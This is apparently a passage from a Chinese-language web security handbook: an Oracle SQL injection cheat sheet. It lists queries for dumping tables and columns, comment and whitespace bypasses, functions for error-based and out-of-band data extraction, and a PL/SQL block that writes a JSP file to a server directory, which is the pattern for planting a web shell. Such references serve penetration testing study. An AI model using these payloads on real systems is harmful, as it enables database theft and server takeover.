Question

4.1.7.4. Oracle Payload

4.1.7.4.1. 常见Payload

• dump

  • select * from v$tablespace;
  • select * from user_tables;
  • select column_name from user_tab_columns where table_name = 'table_name';
  • select column_name, data_type from user_tab_columns where table_name = 'table_name';
  • SELECT * FROM ALL_TABLES

• Comment

  • --
  • /**/

• Space

  • 0x00 0x09 0xa-0xd 0x20

• 报错

  • utl_inaddr.get_host_name
  • ctxsys.drithsx.sn
  • ctxsys.CTX_REPORT.TOKEN_TYPE
  • XMLType
  • dbms_xdb_version.checkin
  • dbms_xdb_version.makeversioned
  • dbms_xdb_version.uncheckout
  • dbms_utility.sqlid_to_sqlhash
  • ordsys.ord_dicom.getmappingxpath
  • utl_inaddr.get_host_name
  • utl_inaddr.get_host_address

• OOB

  • utl_http.request
  • utl_inaddr.get_host_address
  • SYS.DBMS_LDAP.INIT
  • HTTPURITYPE
  • HTTP_URITYPE.GETCLOB

• 绕过

  • rawtohex

4.1.7.4.2. 写文件

create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
   isto_file utl_file.file_type;
begin
   isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
   utl_file.put_line(isto_file, '<% out.println("test"); %>');
   utl_file.fflush(isto_file);
   utl_file.fclose(isto_file);
end;